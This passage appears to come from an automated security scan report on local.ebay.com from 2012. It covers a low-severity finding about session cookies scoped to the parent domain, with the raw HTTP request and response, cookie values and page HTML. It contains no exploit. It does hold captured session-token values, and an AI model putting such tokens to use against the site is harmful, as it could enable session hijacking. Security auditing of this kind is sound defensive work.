Buy","latitude":32.931615,"merchantLogoUrl":"http://milo.com/images/stores/1779.jpg","longitude":-96.821136},"RTPalUrl":null,"price":{"valueInMinorUnits":12499,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":124990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png"},{"merchantTitle":"RadioShack","merchantId":1829,"linkUrl":null,"location":{"merchantName":"RadioShack","latitude":32.7203,"merchantLogoUrl":"http://milo.com/images/stores/1829.jpg","longitude":-96.8303},"RTPalUrl":null,"price":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1829.png"},{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"},{"merchantTitle":"Micro Center","merchantId":3713,"linkUrl":null,"location":{"merchantName":"Micro Center","latitude":32.938058,"merchantLogoUrl":"http://milo.com/images/stores/3713.jpg","longitude":-96.748542},"RTPalUrl":null,"price":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3713.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(58)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":25,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac8a40bc-->

2.4. http://local.ebay.com/Netsparker8fb01a92c9ab454dac239bbf4eea9670  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /Netsparker8fb01a92c9ab454dac239bbf4eea9670

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Netsparker8fb01a92c9ab454dac239bbf4eea9670 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOAYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjWIGbaQ; nonsession=CgADKACBYa0OAYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJCDELkMc1
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a3dda
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOcYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjXm/Xc3; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OcYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJJDJYcLmD; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 37319
Date: Thu, 05 Jan 2012 06:24:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="1097963" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/001/632/630/200/1632049_249630_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=1097963&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty Modern Warfare 2 (PS3)'>Call of Duty Modern Warfare 2 (PS3)</a>
</div><div class="price"><span class="price">$19.96<span class="sep">-</span>$39.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="20060317" coords="32.869443,-96.773501,13820,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13820.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/837/465/200/14837093_20179465_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=20060317&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Kenneth Cole Reaction Handbag, Sleek Wristlet Clutch'>Kenneth Cole Reaction Handbag, Sleek Wristlet Clutch</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="20210332" coords="32.7203,-96.8303,1829,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1829.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/015/030/404/200/15030557_20432404_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=20210332&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Lightwedge.. Verso Prologue Cover for Kindle Fire (Red)'>Lightwedge.. Verso Prologue Cover for Kindle Fire (Red)</a>
</div><div class="price"><span class="price">$39.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12171471" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/824/726/200/10824080_16054726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12171471&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty Modern Warfare 3 for Nintendo Wii'>Call of Duty Modern Warfare 3 for Nintendo Wii</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="7639445" coords="32.868267,-96.775289,10390,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/10390.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/008/677/367/200/8677035_14556367_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=7639445&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Jimmy Choo 'Reese' Clutch'>Jimmy Choo 'Reese' Clutch</a>
</div><div class="price"><span class="price">$595.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18215399" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/897/871/200/11897168_18107871_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18215399&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty: Modern Warfare 3 (XBOX 360)'>Call of Duty: Modern Warfare 3 (XBOX 360)</a>
</div><div class="price"><span class="price">$59.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
